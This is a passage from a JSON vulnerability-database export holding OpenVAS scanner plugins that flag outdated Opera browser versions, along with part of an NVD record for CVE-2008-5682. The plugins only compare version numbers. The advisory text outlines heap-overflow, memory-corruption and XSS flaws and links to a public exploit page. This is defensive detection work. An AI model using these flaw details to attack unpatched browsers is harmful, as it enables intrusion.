\"Upgrade to Opera 9.63\n http://www.opera.com/download/\";\ntag_summary = \"The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.\";\n\nif(description)\n{\n script_id(900082);\n script_version(\"$Revision: 6539 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 14:02:14 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-26 14:23:17 +0100 (Fri, 26 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5679\", \"CVE-2008-5680\", \"CVE-2008-5681\",\n \"CVE-2008-5682\", \"CVE-2008-5683\");\n script_bugtraq_id(32864);\n script_name(\"Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/920/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/921/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/923/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/924/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/docs/changelogs/linux/963/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_opera_detection_linux_900037.nasl\");\n script_mandatory_keys(\"Opera/Linux/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Linux/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less(version:operaVer, test_version:\"9.63\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-16T16:58:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682"], "description": "The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.", "modified": "2020-04-14T00:00:00", "published": "2008-12-26T00:00:00", "id": "OPENVAS:1361412562310900082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900082", "type": "openvas", "title": "Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900082\");\n script_version(\"2020-04-14T08:15:28+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-14 08:15:28 +0000 (Tue, 14 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2008-12-26 14:23:17 +0100 (Fri, 26 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5679\", \"CVE-2008-5680\", \"CVE-2008-5681\",\n \"CVE-2008-5682\", \"CVE-2008-5683\");\n script_bugtraq_id(32864);\n script_name(\"Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux)\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/920/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/921/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/923/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/924/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/docs/changelogs/linux/963/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_opera_detection_linux_900037.nasl\");\n script_mandatory_keys(\"Opera/Linux/Version\");\n\n script_tag(name:\"impact\", value:\"Successful remote attack could inject arbitrary code, information disclosure,\n execute java or plugin content and can even crash the application.\");\n\n script_tag(name:\"affected\", value:\"Opera version prior to 9.63 on Linux.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to\n\n - a buffer overflow error when handling certain text-area contents.\n\n - a memory corruption error when processing certain HTML constructs.\n\n - an input validation error in the feed preview feature when processing URLs.\n\n - an error in the built-in XSLT templates that incorrectly handle escaped\n content.\n\n - an error which could be exploited to reveal random data.\n\n - an error when processing SVG images embedded using img tags.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Opera 9.63.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Linux/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less(version:operaVer, test_version:\"9.63\")){\n report = report_fixed_ver(installed_version:operaVer, fixed_version:\"9.63\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-16T16:58:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682"], "description": "The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.", "modified": "2020-04-14T00:00:00", "published": "2008-12-26T00:00:00", "id": "OPENVAS:1361412562310900081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900081", "type": "openvas", "title": "Opera Web Browser Multiple Vulnerabilities - Dec08 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Opera Web Browser Multiple Vulnerabilities - Dec08 (Windows)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900081\");\n script_version(\"2020-04-14T08:15:28+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-14 08:15:28 +0000 (Tue, 14 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2008-12-26 14:23:17 +0100 (Fri, 26 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5679\", \"CVE-2008-5680\", \"CVE-2008-5681\",\n \"CVE-2008-5682\", \"CVE-2008-5683\");\n script_bugtraq_id(32864);\n script_name(\"Opera Web Browser Multiple Vulnerabilities - Dec08 (Windows)\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/920/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/921/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/923/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/support/kb/view/924/\");\n script_xref(name:\"URL\", value:\"http://www.opera.com/docs/changelogs/windows/963/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_opera_detect_portable_win.nasl\");\n script_mandatory_keys(\"Opera/Win/Version\");\n\n script_tag(name:\"impact\", value:\"Successful remote attack could inject arbitrary code, information disclosure,\n execute java or plugin content and can even crash the application.\");\n\n script_tag(name:\"affected\", value:\"Opera version prior to 9.63 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to\n\n - a buffer overflow error when handling certain text-area contents.\n\n - a memory corruption error when processing certain HTML constructs.\n\n - an input validation error in the feed preview feature when processing URLs.\n\n - an error in the built-in XSLT templates that incorrectly handle escaped\n content.\n\n - an error which could be exploited to reveal random data.\n\n - an error when processing SVG images embedded using img tags.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Opera 9.63.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Win/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less(version:operaVer, test_version:\"9.63\")){\n report = report_fixed_ver(installed_version:operaVer, fixed_version:\"9.63\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5178"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-27T00:00:00", "published": "2008-12-23T00:00:00", "id": "OPENVAS:63044", "href": "http://plugins.openvas.org/nasl.php?oid=63044", "type": "openvas", "title": "FreeBSD Ports: opera, linux-opera", "sourceData": "#\n#VID 225bc349-ce10-11dd-a721-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 225bc349-ce10-11dd-a721-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n opera\n linux-opera\n\nCVE-2008-5178\nHeap-based buffer overflow in Opera 9.62 on Windows allows remote\nattackers to execute arbitrary code via a long file:// URI.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.opera.com/support/kb/view/920/\nhttp://www.opera.com/support/kb/view/921/\nhttp://www.opera.com/support/kb/view/922/\nhttp://www.opera.com/support/kb/view/923/\nhttp://www.opera.com/support/kb/view/924/\nhttp://secunia.com/advisories/32752/\nhttp://www.vuxml.org/freebsd/225bc349-ce10-11dd-a721-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(63044);\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-23 18:28:16 +0100 (Tue, 23 Dec 2008)\");\n script_cve_id(\"CVE-2008-5178\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: opera, linux-opera\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"opera\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.63\")<0) {\n txt += 'Package opera version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-opera\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.63\")<0) {\n txt += 'Package linux-opera version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-19T10:49:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5178"], "description": "The host is installed with Opera Web Browser and is prone to\n buffer overflow vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2008-11-21T00:00:00", "id": "OPENVAS:800066", "href": "http://plugins.openvas.org/nasl.php?oid=800066", "type": "openvas", "title": "Opera Web Browser Heap Based Buffer Overflow Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_opera_file_heap_bof_vuln_win.nasl 6519 2017-07-04 14:08:14Z cfischer $\n#\n# Opera Web Browser Heap Based Buffer Overflow Vulnerability (Windows)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful remote attack could allow arbitrary code execution\n by tricking user into opening malicious HTML file.\n Impact Level: Application\";\ntag_affected = \"Opera version 9.62 and prior on Windows.\";\ntag_insight = \"The flaw is due to an error while processing an overly long\n file:// URI.\";\ntag_solution = \"Upgrade to Opera 9.63\n http://www.opera.com/download/\";\ntag_summary = \"The host is installed with Opera Web Browser and is prone to\n buffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(800066);\n script_version(\"$Revision: 6519 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 16:08:14 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-21 14:18:03 +0100 (Fri, 21 Nov 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5178\");\n script_bugtraq_id(32323);\n script_name(\"Opera Web Browser Heap Based Buffer Overflow Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://milw0rm.com/exploits/7135\");\n script_xref(name : \"URL\" , value : \"http://www.frsirt.com/english/advisories/2008/3183\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_opera_detection_win_900036.nasl\");\n script_mandatory_keys(\"Opera/Win/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Win/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:operaVer, test_version:\"9.62\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5178"], "description": "The host is installed with Opera Web Browser and is prone to\n buffer overflow vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2008-11-21T00:00:00", "id": "OPENVAS:1361412562310800066", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800066", "type": "openvas", "title": "Opera Web Browser Heap Based Buffer Overflow Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Opera Web Browser Heap Based Buffer Overflow Vulnerability (Windows)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800066\");\n script_version(\"2020-04-27T11:01:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 11:01:03 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2008-11-21 14:18:03 +0100 (Fri, 21 Nov 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5178\");\n script_bugtraq_id(32323);\n script_name(\"Opera Web Browser Heap Based Buffer Overflow Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://milw0rm.com/exploits/7135\");\n script_xref(name:\"URL\", value:\"http://www.frsirt.com/english/advisories/2008/3183\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_opera_detect_portable_win.nasl\");\n script_mandatory_keys(\"Opera/Win/Version\");\n\n script_tag(name:\"impact\", value:\"Successful remote attack could allow arbitrary code execution\n by tricking user into opening malicious HTML file.\");\n\n script_tag(name:\"affected\", value:\"Opera version 9.62 and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error while processing an overly long\n file:// URI.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Opera 9.63.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Opera Web Browser and is prone to\n buffer overflow vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Win/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:operaVer, test_version:\"9.62\")){\n report = report_fixed_ver(installed_version:operaVer, vulnerable_range:\"Less than or equal to 9.62\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0915", "CVE-2009-0914"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-23T00:00:00", "published": "2009-03-20T00:00:00", "id": "OPENVAS:63634", "href": "http://plugins.openvas.org/nasl.php?oid=63634", "type": "openvas", "title": "FreeBSD Ports: opera, linux-opera", "sourceData": "#\n#VID 8c5205b4-11a0-11de-a964-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 8c5205b4-11a0-11de-a964-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n opera\n linux-opera\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.opera.com/docs/changelogs/freebsd/964/\nhttp://secunia.com/advisories/34135/\nhttp://www.vuxml.org/freebsd/8c5205b4-11a0-11de-a964-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(63634);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-20 00:52:38 +0100 (Fri, 20 Mar 2009)\");\n script_cve_id(\"CVE-2009-0914\", \"CVE-2009-0915\");\n script_name(\"FreeBSD Ports: opera, linux-opera\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"opera\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.64\")<0) {\n txt += 'Package opera version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-opera\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.64\")<0) {\n txt += 'Package linux-opera version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-12-09T19:28:27", "description": "Cross-site scripting (XSS) vulnerability in Opera before 9.63 allows remote attackers to inject arbitrary web script or HTML via built-in XSLT templates.", "edition": 6, "cvss3": {}, "published": "2008-12-19T16:30:00", "title": "CVE-2008-5682", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5682"], "modified": "2012-06-07T17:22:00", "cpe": ["cpe:/a:opera:opera_browser:9.61", "cpe:/a:opera:opera_browser:8.53", "cpe:/a:opera:opera_browser:3.21", "cpe:/a:opera:opera_browser:3.62", "cpe:/a:opera:opera_browser:7.21", "cpe:/a:opera:opera_browser:6.1", "cpe:/a:opera:opera_browser:7.50", "cpe:/a:opera:opera_browser:9.27", "cpe:/a:opera:opera_browser:7.03", "cpe:/a:opera:opera_browser:5.11", "cpe:/a:opera:opera_browser:8.0", "cpe:/a:opera:opera_browser:1.00", "cpe:/a:opera:opera_browser:8.54", "cpe:/a:opera:opera_browser:7.51", "cpe:/a:opera:opera_browser:7.22", "cpe:/a:opera:opera_browser:8.50", "cpe:/a:opera:opera_browser:6.06", "cpe:/a:opera:opera_browser:9.0", "cpe:/a:opera:opera_browser:9.20", "cpe:/a:opera:opera_browser:7.20", "cpe:/a:opera:opera_browser:7.0", "cpe:/a:opera:opera_browser:3.51", "cpe:/a:opera:opera_browser:2.00", "cpe:/a:opera:opera_browser:3.50", "cpe:/a:opera:opera_browser:9.26", "cpe:/a:opera:opera_browser:2.10", "cpe:/a:opera:opera_browser:2.12", "cpe:/a:opera:opera_browser:4.02", "cpe:/a:opera:opera_browser:6.11", "cpe:/a:opera:opera_browser:9.23", "cpe:/a:opera:opera_browser:8.02", "cpe:/a:opera:opera_browser:6.02", "cpe:/a:opera:opera_browser:5.02", "cpe:/a:opera:opera_browser:5.0", "cpe:/a:opera:opera_browser:8.51", "cpe:/a:opera:opera_browser:8.01", "cpe:/a:opera:opera_browser:9.25", "cpe:/a:opera:opera_browser:6.04", "cpe:/a:opera:opera_browser:9.50", "cpe:/a:opera:opera_browser:4.01", "cpe:/a:opera:opera_browser:9.60", "cpe:/a:opera:opera_browser:6.01", "cpe:/a:opera:opera_browser:9.21", "cpe:/a:opera:opera_browser:6.03", "cpe:/a:opera:opera_browser:3.00", "cpe:/a:opera:opera_browser:9.52", "cpe:/a:opera:opera_browser:9.12", "cpe:/a:opera:opera_browser:9.24", "cpe:/a:opera:opera_browser:7.52", "cpe:/a:opera:opera_browser:7.54", "cpe:/a:opera:opera_browser:7.60", "cpe:/a:opera:opera_browser:9.62", "cpe:/a:opera:opera_browser:6.12", "cpe:/a:opera:opera_browser:9.51", "cpe:/a:opera:opera_browser:6.0", "cpe:/a:opera:opera_browser:7.10", "cpe:/a:opera:opera_browser:7.53", "cpe:/a:opera:opera_browser:3.60", "cpe:/a:opera:opera_browser:5.10", "cpe:/a:opera:opera_browser:5.12", "cpe:/a:opera:opera_browser:7.01", "cpe:/a:opera:opera_browser:9.02", "cpe:/a:opera:opera_browser:9.22", "cpe:/a:opera:opera_browser:3.10", "cpe:/a:opera:opera_browser:8.52", "cpe:/a:opera:opera_browser:3.61", "cpe:/a:opera:opera_browser:9.10", "cpe:/a:opera:opera_browser:9.01", "cpe:/a:opera:opera_browser:4.00", "cpe:/a:opera:opera_browser:6.05", "cpe:/a:opera:opera_browser:7.02", "cpe:/a:opera:opera_browser:7.11", "cpe:/a:opera:opera_browser:7.23"], "id": "CVE-2008-5682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5682", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:opera:opera_browser:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.62:*:*:*:*:*:*:*", 